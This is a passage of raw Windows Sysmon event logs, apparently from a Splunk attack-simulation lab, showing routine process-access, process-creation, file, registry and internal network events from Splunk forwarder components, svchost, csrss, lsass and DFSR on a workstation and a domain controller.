11:08:49.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-15C1-6216-DB04-000000003902}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15C1-6216-DB04-000000003902}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.255{4F8D34B0-15C1-6216-DB04-000000003902}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:50.597{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=837CA615484A39243C81AA26D43A3FA1,SHA256=940240A598059F52E7678E3CE7FA94943D5D78E54F6C5560CAB2C3BF26D20173,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:50.027{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C126FC094BC462E26582844FEE3A445,SHA256=D94ABEE9D7840E61B07D0AD09CA6A3B61209E6AADEF29265F10E231907B4B13A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:50.300{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53BFAA17A206DBC462B27073A44256FD,SHA256=1B74099E441969D325F91F9E76BD9231019430F9126E2A0956001CB94395252D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:50.035{4F8D34B0-15C1-6216-DC04-000000003902}19443092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.612{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EFC797163AF3237FC04D57C527C350F,SHA256=B678413674F58E97D00E20BB98015F5AB25ED579F03D5657C866270EDB13F68B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000295884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:08:51.765{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000295883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:08:51.765{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000295882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:08:51.765{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000295881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:51.728{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:51.728{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:51.047{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6046B63A8DE956E34C49D98BBD8533BA,SHA256=F4EFC657086A0F9F58B5D3F69A8A74BCE94F4179C380BA549AC226D855B454E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15C3-6216-DD04-000000003902}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-15C3-6216-DD04-000000003902}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.222{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15C3-6216-DD04-000000003902}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:51.223{4F8D34B0-15C3-6216-DD04-000000003902}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000220057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:50.671{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51554-false10.0.1.12-8000- 23542300x8000000000000000220056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:52.628{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8CE1ED8ADD2F4A0D68F2F0871B21EC0,SHA256=3B49EA12B4C412816B323FB1A6FFC69352527806421B4377CA3AA896537C3BDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:50.739{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49288-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000295888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 